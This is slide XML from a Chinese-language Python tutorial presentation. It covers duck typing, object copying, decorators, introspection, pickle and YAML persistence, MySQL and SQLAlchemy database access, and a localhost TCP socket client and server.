              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>God is running...</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> run_twice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>(animal):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> animal.run()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> animal.run()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2370481" y="1238124"/>
            <a:ext cx="1728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#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>实例化调用</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>dog = Dog()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>cat = Cat()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>g</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>od=God()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dog.run()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>cat.run()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>g</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>od.run()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>run_twice(dog)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>run_twice(cat)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>run_twice(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>g</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>od)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="矩形 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4098672" y="1238124"/>
            <a:ext cx="19218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输出结果：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>Dog is running...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>Cat is running...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>God is running...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>Dog is running...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>Dog is running...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>Cat is running...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>Cat is running...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>God is running...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>God is running...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0" y="1331457"/>
            <a:ext cx="2269135" cy="2269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56385" y="3784766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记住这只鸭！</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="188611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4" y="163892"/>
            <a:ext cx="3925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函数式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>VS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>面向对象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0413" y="586670"/>
            <a:ext cx="456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老王</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>50</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>岁的生活 上班、下班、打豆豆。。。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6938"/>
            <a:ext cx="3218483" cy="34256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272050" y="8629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函数式编程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73" y="1256938"/>
            <a:ext cx="4055196" cy="34256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669760" y="8569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面向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-C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编程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5" r="42125"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3651747" y="1077974"/>
            <a:ext cx="957981" cy="12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9867" y="167087"/>
            <a:ext cx="321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对象的深拷贝与浅拷贝</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4046941" y="645008"/>
            <a:ext cx="48245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一切皆对象，并且规定参数的传递都是对象的引用。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参数传递都是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传对象引用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方式。相当于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中传值和传引用的结合。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zh-CN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如果函数收到的是可变对象（比如字典或者列表）的引用，就能修改对象的原始值，相当于通过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传引用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来传递对象。不可变对象（比如数字、字符或者元组）的引用，就不能直接修改原始对象相当于通过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传值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来传递对象。</a:t>
            </a:r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中的对象之间赋值时是按引用传递的，如需要拷贝对象，需要使用标准库中的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模块。 </a:t>
            </a:r>
            <a:b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copy.copy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浅拷贝只复制父对象，对象的内部的子对象依然是引用。</a:t>
            </a:r>
            <a:b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copy.deepcopy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深拷贝拷贝对象及其子对象，这意味着引用的父对象和子对象都不同，就是新建了一个对象，建立了引用。相当于传值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7" y="596885"/>
            <a:ext cx="3530045" cy="40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1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49867" y="167087"/>
            <a:ext cx="321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拷贝日常误区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699542"/>
            <a:ext cx="7598519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b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>列表切片和函数式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>copy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>：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['name', ['savings', 100.00]]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person[:] 	# slice copy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list(person) 	#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copy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&gt;&gt;&gt;[id(x) for x in (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0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Chen)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zh-CN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Lee,Chen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000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+mn-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>都是引用式的浅拷贝</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="+mn-lt"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea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b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>深拷贝 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>copy.deepcopy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea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copy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Lee = person[:] 	# slice copy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Chen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copy.deepcopy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(person)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91733" y="154543"/>
            <a:ext cx="3483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内置装饰器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6" y="563944"/>
            <a:ext cx="3027183" cy="41540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98" y="571895"/>
            <a:ext cx="2318729" cy="4154016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6723393" y="569927"/>
            <a:ext cx="2160240" cy="4148034"/>
          </a:xfr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执行结果：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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变量作用域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</a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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#property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装饰器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</a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone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类方法和静态方法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normal show 22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staic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show 16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class show 18</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-C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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-C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staic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show 16</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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just class show 18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9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3851"/>
            <a:ext cx="3299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对象魔术自省方法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367214" y="553961"/>
            <a:ext cx="4323730" cy="4154984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student(object):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self,name,age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self.name = name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student('laowang',32)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haha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增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stu.sa = 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haha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.sa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删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 stu.sa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,'age','18')#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改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stu.age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18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.age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,'age')#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stu.age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age','no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age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aged','no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aged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02415" y="553961"/>
            <a:ext cx="3659106" cy="1661993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laowang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{'sa': 'haha', 'age': 32, 'name': 'laowang'}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haha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{'age': 32, 'name': 'laowang'}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{'age': '18', 'name': 'laowang'}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</a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" alt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no aged attr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21248" y="2334561"/>
            <a:ext cx="3638105" cy="236988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函数都是可调用对象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一个类实例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实现一个特殊方法__call__()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也可以变成一个可调用对象</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN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Person(object):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9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__init__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name, gender):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 = name self.gender = gender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9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__call__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friend):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'My name is %s...'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 self.name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'My friend is %s...'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 friend</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="9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9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Person(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9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LaoWang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'male'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p(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9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LaoSun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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN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等价 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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p.__call</a:t>
            </a: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9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LaoSun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="9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 name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9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LaoWang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endParaRPr lang="en-US" altLang="zh-CN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 friend </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN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9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LaoSun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN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zh-CN" altLang="zh-CN" sz="600" dirty="0"/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89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53851"/>
            <a:ext cx="3299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数据持久化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699542"/>
            <a:ext cx="4323730" cy="3046988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pickle #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标准库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#pickle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对象持久化写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data={'a':'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laowang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','b':'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laosun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','c':[1,2,3]} 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纯文本存入读取需要复杂解析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pickle_file1=open('1.pkl','w')</a:t>
            </a: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(data,pickle_file1,-1) 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二进制保存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(data,pickle_file1)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pickle_file1.close()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="12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#pickle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读取持久化对读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pickle_file2=open('1.pkl','r')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read_pickle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(pickle_file2)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read_pickle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pickle_file2.close()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7080" y="699542"/>
            <a:ext cx="3659106" cy="3600986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PyYAML</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="12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yaml_file1=open('1.yaml','w')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yaml_file2=open('2.yaml','w')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data={'a':'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laowang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','b':'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laosun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','c':[1,2,3]}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yaml.dump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(data,yaml_file1)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yaml.dump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(data,yaml_file2,default_flow_style=False)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yaml_file1.close()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yaml_file2.close()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200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读取序列化数据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yaml_file1=open('1.yaml','r')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yaml_file2=open('2.yaml','r')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yaml.load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(yaml_file1)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yaml.load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(yaml_file2)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yaml_file1.close()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yaml_file2.close()</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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3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8319" y="1418617"/>
            <a:ext cx="7632848" cy="310644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（数字）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a=12; b=1.2; c=True; d=1+2j</a:t>
            </a:r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（字符串）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'ab' or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="ab"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（列表）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[ 'a', 1 , 1.2, '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', 70.2 ]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（元组）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mytuple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(12, 'ab')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Sets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（集合）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=( {'Tom', 'Jim'} ) or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=set( ['Tom', 'Jim'] )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（字典）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{key1 : value1, key2 : value2 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3 CuadroTexto"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7706464" y="48230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09835"/>
            <a:ext cx="3097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变量及数据类型</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="217006" y="658961"/>
            <a:ext cx="867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中有六种标准的数据类型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6900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gallery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9" r="6294"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3899867" y="987574"/>
            <a:ext cx="4096406" cy="3096344"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="13 CuadroTexto"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7667190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AEDA"/>
                </a:solidFill>
              </a:rPr>
              <a:t>90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13965" y="128957"/>
            <a:ext cx="334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应用进阶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9552" y="987574"/>
            <a:ext cx="4360532" cy="2664296"/>
            <a:chOff x="539552" y="987574"/>
            <a:chExt cx="4360532" cy="2664296"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="57" name="Picture 2" descr="牛皮纸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" t="3812" r="3680" b="4240"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="539552" y="987574"/>
              <a:ext cx="4360532" cy="266429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219597" y="1347614"/>
              <a:ext cx="26642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数据库操作</a:t>
              </a:r>
              <a:endPara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简单网络编程</a:t>
              </a:r>
              <a:endPara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多线程和多进程</a:t>
              </a:r>
              <a:endPara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调用</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN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c/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN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c++</a:t>
              </a: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库</a:t>
              </a:r>
              <a:endPara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网络小爬虫</a:t>
              </a:r>
              <a:endPara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8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91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22188"/>
            <a:ext cx="2250112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数据库操作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3965" y="633413"/>
            <a:ext cx="4050312" cy="4001095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MySQLdb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打开数据库连接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MySQLdb.connect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("10.84.136.125",\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salt","salt","salt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cursor()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方法获取操作游标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cursor =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SQL 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查询语句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sqlQuery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jids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sqlQuery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)# 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执行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获取所有记录列表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 =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row in results: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row[0]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load = row[1]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打印结果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"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=%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s,load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=%s" %(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load)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Exception,e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"Error: unable to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fecth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data",e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1B2D2E-6AA3-4FE5-9C29-955802633950}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4355976" y="637432"/>
            <a:ext cx="4536504" cy="3970318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dataList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=[ ['888121','aba'], ['888131','bcb'],\ ['888141','cdc'] ]</a:t>
            </a:r>
          </a:p>
          <a:p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SQL </a:t>
            </a:r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插入语句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sqlInsert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jids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'load') VALUES (%s, %s)" \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%("'999123456'","'dajiangyou'")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sqlInsertMany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jids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'load') VALUES (%s, %s )"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执行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</a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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sqlInsert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cursor.executemany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sqlInsertMany,dataList</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200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#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提交到数据库执行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Exception,e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发生错误时回滚</a:t>
            </a:r>
          </a:p>
          <a:p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e</a:t>
            </a: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db.rollback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关闭数据库连接</a:t>
            </a:r>
          </a:p>
          <a:p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92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43704"/>
            <a:ext cx="340224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对象关系映射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519112"/>
            <a:ext cx="8439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93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33656" y="143704"/>
            <a:ext cx="3402240" cy="39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Sqlalchemy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增 删 查 改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78228"/>
            <a:ext cx="8496944" cy="41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94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网络编程模型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-TCP</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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85662" y="2487602"/>
            <a:ext cx="4353570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zh-CN" dirty="0"/>
              <a:t>server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>端</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="900" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="FF7800"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial Unicode MS" panose="020B0604020202020204" pitchFamily="34" charset="-122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b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF7800"/>
              </a:solidFill>
              <a:latin typeface="Arial Unicode MS" panose="020B0604020202020204" pitchFamily="34" charset="-122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socket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socket.socket()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s.bind((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127.0.0.1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8000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#监听连接请求，其中的1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，是指监听一个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s.listen(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#进行循环，一直监听client发来的消息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while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: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#获取链接IP和端口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conn,addr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s.accept()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print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[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addr[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]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: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Arial Unicode MS" panose="020B0604020202020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Monaco"/>
              </a:rPr>
              <a:t>str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(addr[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])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]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send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a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message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to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me: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conn.recv(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1024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conn.sendall(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I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received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a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message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[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addr[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]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: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Arial Unicode MS" panose="020B0604020202020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Monaco"/>
              </a:rPr>
              <a:t>str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(addr[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])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+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]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s.close()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08788" y="650656"/>
            <a:ext cx="2520280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zh-CN" dirty="0"/>
              <a:t>client </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>端</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="900" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="FF7800"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial Unicode MS" panose="020B0604020202020204" pitchFamily="34" charset="-122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b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF7800"/>
              </a:solidFill>
              <a:latin typeface="Arial Unicode MS" panose="020B0604020202020204" pitchFamily="34" charset="-122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socket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socket.socket()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s.connect((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127.0.0.1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,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8000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))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lang="zh-CN" altLang="zh-CN" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008200"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS" panose="020B0604020202020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Monaco"/>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008200"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS" panose="020B0604020202020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Monaco"/>
              </a:rPr>
              <a:t>连接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2"/>
                <a:ea typeface="Monaco"/>
              </a:rPr>
              <a:t>#获取键盘输入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msg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FF7800"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Unicode MS" panose="020B0604020202020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Monaco"/>
              </a:rPr>
              <a:t>=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Arial Unicode MS" panose="020B0604020202020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Monaco"/>
              </a:rPr>
              <a:t>raw_input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(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Please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input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your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message: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Monac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s.sendall(msg)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Arial Unicode MS" panose="020B0604020202020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Monaco"/>
              </a:rPr>
              <a:t>print</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN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Monac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s.recv(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 panose="020B0604020202020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Monaco"/>
              </a:rPr>
              <a:t>1024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)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Monaco"/>
              </a:rPr>
              <a:t>s.close()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436096" y="1165924"/>
            <a:ext cx="3139351" cy="3287734"/>
            <a:chOff x="5610999" y="699542"/>
            <a:chExt cx="2923327" cy="3503758"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="文本框 18"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7452320" y="699542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Socket()</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="9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452320" y="1109957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bind()</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="900" dirty="0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7794326" y="945302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452319" y="1513335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listen()</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="900" dirty="0"/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7794325" y="1341246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7452319" y="1916713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accept()</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="900" dirty="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7794325" y="1744624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452319" y="2619300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read()</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="900" dirty="0"/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7794325" y="2198530"/>
              <a:ext cx="1" cy="39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7452319" y="3073206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write()</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="900" dirty="0"/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7794325" y="2901117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452319" y="3507250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read()</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="900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7794325" y="3350029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7452319" y="3972468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close()</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="900" dirty="0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7794325" y="3800379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471194" y="1642131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建立连接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611000" y="1248184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Socket()</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="9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11000" y="1658599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 err="1"/>
                <a:t>connnect</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
                <a:t>()</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="900" dirty="0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5953006" y="1486510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5610999" y="2061977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write()</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="900" dirty="0"/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5953005" y="1889888"/>
              <a:ext cx="1" cy="140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5610999" y="2743951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read()</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="900" dirty="0"/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5953005" y="2338302"/>
              <a:ext cx="1" cy="39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5953005" y="2990156"/>
              <a:ext cx="0" cy="286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5637838" y="3276994"/>
              <a:ext cx="684013" cy="2308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close()</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="9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6295011" y="1789660"/>
              <a:ext cx="1485181" cy="534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7382198" y="2290042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阻塞到有客户端连接</a:t>
              </a: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283711" y="2240802"/>
              <a:ext cx="1168608" cy="3561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6554336" y="2160018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请求数据</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="71" name="直接箭头连接符 70"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="37" idx="1"/>
              <a:endCxn id="54" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="6295012" y="2859367"/>
              <a:ext cx="1157307" cy="329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6457303" y="3465026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结束连接</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="74" name="直接箭头连接符 73"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="60" idx="3"/>
              <a:endCxn id="41" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6321851" y="3392410"/>
              <a:ext cx="1130468" cy="230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6641767" y="2918131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回应数据</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="82" name="肘形连接符 81"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="54" idx="1"/>
              <a:endCxn id="50" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="5610999" y="2177393"/>
              <a:ext cx="12700" cy="681974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stCxn id="37" idx="3"/>
              <a:endCxn id="35" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="8136332" y="2734716"/>
              <a:ext cx="12700" cy="453906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/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5364088" y="129486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客户端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7357643" y="74797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服务端</a:t>
            </a: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149664" y="1843856"/>
            <a:ext cx="3203802" cy="1384995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/>
              <a:t>socket(socket.AF_INET,socket.SOCK_STREAM,0)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socket.AF_INET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IPv4（默认）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="8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socket.AF_UNIX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只能够用于单一的Unix系统进程间通信</a:t>
            </a:r>
